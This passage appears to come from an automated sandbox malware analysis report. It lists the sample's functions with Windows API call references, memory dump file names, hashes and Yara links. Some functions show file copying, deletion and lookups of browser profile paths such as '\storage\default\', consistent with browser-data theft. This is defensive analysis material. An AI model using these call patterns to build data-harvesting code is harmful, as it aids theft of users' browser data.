                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9880f2f06d44d51fe4f7b26d7e0718638a0a55b9ad7e98bbc95e56bba8b160a4
                        • Instruction ID: 34eb75b2a1fb8636d3138874c3254a639482f0b00afe61b0211034b68a88f89d
                        • Opcode Fuzzy Hash: 9880f2f06d44d51fe4f7b26d7e0718638a0a55b9ad7e98bbc95e56bba8b160a4
                        • Instruction Fuzzy Hash: CC51F8F3A0C6145FE3186E69DC8162BF7D9EBA8320F17453EE9C8D3340E5765C008692
                        Function 007EF4B6 Relevance: .2, Instructions: 169COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 104fa2f1409c4ada48a89ec47866048507319e91d8f7becbcbffcbe36750d2f1
                        • Instruction ID: 125dc0fa0ab650cac2cdd4690cb2a5050acbdaca1d8311091acad7e003daffef
                        • Opcode Fuzzy Hash: 104fa2f1409c4ada48a89ec47866048507319e91d8f7becbcbffcbe36750d2f1
                        • Instruction Fuzzy Hash: B75137F3E082149FF3156929DC547BAB7DAEBD4330F1B853DAA9487784EE3958028285
                        Function 007CA2E8 Relevance: .1, Instructions: 143COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 12a9acbee3fd88cae0095ab1b588acf4dc11efd50eb1186edbc55248b3836478
                        • Instruction ID: 78f73b0cf30302793b375496e649545112804dac6cfc0a101bc74d821ecb57fa
                        • Opcode Fuzzy Hash: 12a9acbee3fd88cae0095ab1b588acf4dc11efd50eb1186edbc55248b3836478
                        • Instruction Fuzzy Hash: 094125F36181009BF348EE29DC857BB77EAEBD4310F1A8A3DD6C1C3784E93999058646
                        Function 008311CE Relevance: .1, Instructions: 102COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eadde4060911fa0a5dd9f7769dc065d84fc9d20144d59ac63390ffd30418e407
                        • Instruction ID: f1e87391a2a5572dec3e98cf6fbab062139052b337e1de8d87be5fa7b89ed430
                        • Opcode Fuzzy Hash: eadde4060911fa0a5dd9f7769dc065d84fc9d20144d59ac63390ffd30418e407
                        • Instruction Fuzzy Hash: 1B3168B210D314AFD715BF18EC826BAFBE9EF98360F06492DE6C483600D6755880CB97
                        Function 004585B0 Relevance: 69.4, APIs: 45, Strings: 1, Instructions: 449stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 00458636
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045866D
                        • lstrcpy.KERNEL32(?,00000000), ref: 004586AA
                        • StrStrA.SHLWAPI(?,0158E0A0), ref: 004586CF
                        • lstrcpyn.KERNEL32(006793D0,?,00000000), ref: 004586EE
                        • lstrlen.KERNEL32(?), ref: 00458701
                        • wsprintfA.USER32 ref: 00458711
                        • lstrcpy.KERNEL32(?,?), ref: 00458727
                        • StrStrA.SHLWAPI(?,0158E250), ref: 00458754
                        • lstrcpy.KERNEL32(?,006793D0), ref: 004587B4
                        • StrStrA.SHLWAPI(?,0158E010), ref: 004587E1
                        • lstrcpyn.KERNEL32(006793D0,?,00000000), ref: 00458800
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                        • String ID: %s%s
                        • API String ID: 2672039231-3252725368
                        • Opcode ID: 6a5f0bde40fcc3829e4634f2095e26a34946252d74cca9de7d864eb4dcd2aee9
                        • Instruction ID: f39becda513ddb066a113b9a11eed9864fac45237c189040d688a70860c547fd
                        • Opcode Fuzzy Hash: 6a5f0bde40fcc3829e4634f2095e26a34946252d74cca9de7d864eb4dcd2aee9
                        • Instruction Fuzzy Hash: 72F17A71A00114AFDB14DB74DD48AEAB7BAEF88310F108159F90DA7351EF74AE44CBA5
                        Function 00441F79 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00441F9F
                        • lstrlen.KERNEL32(015892A8), ref: 00441FAE
                        • lstrcpy.KERNEL32(00000000,?), ref: 00441FDB
                        • lstrcat.KERNEL32(00000000,?), ref: 00441FE3
                        • lstrlen.KERNEL32(00471794), ref: 00441FEE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044200E
                        • lstrcat.KERNEL32(00000000,00471794), ref: 0044201A
                        • lstrcpy.KERNEL32(00000000,?), ref: 00442042
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044204D
                        • lstrlen.KERNEL32(00471794), ref: 00442058
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00442075
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00442081
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004420AC
                        • lstrlen.KERNEL32(?), ref: 004420E4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00442104
                        • lstrcat.KERNEL32(00000000,?), ref: 00442112
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00442139
                        • lstrlen.KERNEL32(00471794), ref: 0044214B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044216B
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00442177
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044219D
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004421A8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004421D4
                        • lstrlen.KERNEL32(?), ref: 004421EA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044220A
                        • lstrcat.KERNEL32(00000000,?), ref: 00442218
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00442242
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044227F
                        • lstrlen.KERNEL32(0158D250), ref: 0044228D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004422B1
                        • lstrcat.KERNEL32(00000000,0158D250), ref: 004422B9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004422F7
                        • lstrcat.KERNEL32(00000000), ref: 00442304
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044232D
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00442356
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00442382
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004423BF
                        • DeleteFileA.KERNEL32(00000000), ref: 004423F7
                        • FindNextFileA.KERNEL32(00000000,?), ref: 00442444
                        • FindClose.KERNEL32(00000000), ref: 00442453
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                        • String ID:
                        • API String ID: 2857443207-0
                        • Opcode ID: 288e8445349459c68df0196558bee14fccb5e3ab4bcc92ec8187e2e9c005d59c
                        • Instruction ID: 6e7b7b3446fe329b1fc9e002b405679612c8aca8b87a74c42c3877b0c8e26d60
                        • Opcode Fuzzy Hash: 288e8445349459c68df0196558bee14fccb5e3ab4bcc92ec8187e2e9c005d59c
                        • Instruction Fuzzy Hash: EEE16671A102069BEB21EF75DE85A9FB7B9AF04304F84502AFC05A7311DB78DD45CBA8
                        Function 00456410 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 438stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00456445
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00456480
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 004564AA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004564E1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456506
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0045650E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456537
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FolderPathlstrcat
                        • String ID: \..\
                        • API String ID: 2938889746-4220915743
                        • Opcode ID: 984b1e41eb5ed53b7d9413323948c40d4703bab43b254131b032b912d2fa3b6b
                        • Instruction ID: d2b821b74d7ffa2513619633e9c1b8c2d30ce5913f7c76e31737894b1ce37d37
                        • Opcode Fuzzy Hash: 984b1e41eb5ed53b7d9413323948c40d4703bab43b254131b032b912d2fa3b6b
                        • Instruction Fuzzy Hash: 04F1CE70A01205ABDB25AF35DD49AAF77B5AF04305F85402AFC4597352DB3CDC49CBA8
                        Function 00454370 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 334stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004543A3
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004543D6
                        • lstrcpy.KERNEL32(00000000,?), ref: 004543FE
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00454409
                        • lstrlen.KERNEL32(\storage\default\), ref: 00454414
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00454431
                        • lstrcat.KERNEL32(00000000,\storage\default\), ref: 0045443D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00454466
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00454471
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00454498
                        • lstrcpy.KERNEL32(00000000,?), ref: 004544D7
                        • lstrcat.KERNEL32(00000000,?), ref: 004544DF
                        • lstrlen.KERNEL32(00471794), ref: 004544EA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00454507
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00454513
                        • lstrlen.KERNEL32(.metadata-v2), ref: 0045451E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045453B
                        • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00454547
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045456E
                        • lstrcpy.KERNEL32(00000000,?), ref: 004545A0
                        • GetFileAttributesA.KERNEL32(00000000), ref: 004545A7
                        • lstrcpy.KERNEL32(00000000,?), ref: 00454601
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045462A
                        • lstrcpy.KERNEL32(00000000,?), ref: 00454653
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045467B
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004546AF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                        • String ID: .metadata-v2$\storage\default\
                        • API String ID: 1033685851-762053450
                        • Opcode ID: 4456c9bf8c72e5ed32df5437790236a224f688400a7ed91de89922e20b191672
                        • Instruction ID: 6e3580512d2a3ea0d31547485fc14b9194675e2b17a93cc610f505fb8c34f90c
                        • Opcode Fuzzy Hash: 4456c9bf8c72e5ed32df5437790236a224f688400a7ed91de89922e20b191672
                        • Instruction Fuzzy Hash: 49B1D530610206ABDB21EF75DD49A6F77A9AF44309F40102AFC45EB352DB7CDC858BA8
                        Function 004557A0 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004557D5
                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00455804
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00455835
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045585D
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00455868
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00455890
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004558C8
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004558D3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004558F8
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0045592E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00455956
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00455961
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00455988
                        • lstrlen.KERNEL32(00471794), ref: 0045599A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004559B9
                        • lstrcat.KERNEL32(00000000,00471794), ref: 004559C5
                        • lstrlen.KERNEL32(0158D460), ref: 004559D4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004559F7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00455A02
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00455A2C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00455A58
                        • GetFileAttributesA.KERNEL32(00000000), ref: 00455A5F
                        • lstrcpy.KERNEL32(00000000,?), ref: 00455AB7
                        • lstrcpy.KERNEL32(00000000,?), ref: 00455B2D
                        • lstrcpy.KERNEL32(00000000,?), ref: 00455B56
                        • lstrcpy.KERNEL32(00000000,?), ref: 00455B89
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00455BB5
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00455BEF
                        • lstrcpy.KERNEL32(00000000,?), ref: 00455C4C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00455C70
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
